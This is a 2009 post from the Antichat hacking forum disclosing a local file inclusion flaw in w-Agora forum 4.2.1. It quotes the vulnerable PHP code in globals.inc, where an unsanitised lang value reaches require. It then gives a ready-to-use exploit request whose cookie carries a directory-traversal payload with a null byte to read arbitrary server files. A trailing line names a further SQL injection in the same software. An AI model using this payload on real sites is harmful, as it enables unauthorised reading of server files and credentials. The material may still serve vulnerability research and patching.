
28.12.2009, 20:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме: 3217552
Репутация:
1668
|
|
w-Agora forum
Web site : http://www.w-agora.com
Version : 4.2.1
Local File Inclusion
Vuln file: globals.inc [str:169]
PHP код:
/*...*/
if (isset($_GET['lang']) ) {
$lang = strtolower($_GET['lang']);
} elseif (isset($_POST['lang'])) {
$lang = $_POST['lang'];
} elseif (isset($_COOKIE['wa_lang'])) {
$lang = $_COOKIE['wa_lang'];
} elseif (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ) {
$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
} elseif (isset($_COOKIE['lang'])) {
$lang = strtolower($_COOKIE['lang']);
}
/*...*/
require ("$lang_dir/lang_$lang.inc");
/*...*/
Exploit:
if magic_quotes = OFF
Код:
GET http://[host]/[path]/index.php HTTP/1.0
Cookie: lang=/../../../../../../[local_file]%00
-------------------------------------------
w-Agora <= 4.2.1 (cat) Remote SQL Injection Vulnerability
Последний раз редактировалось RulleR; 28.12.2009 в 20:06..
|
|
|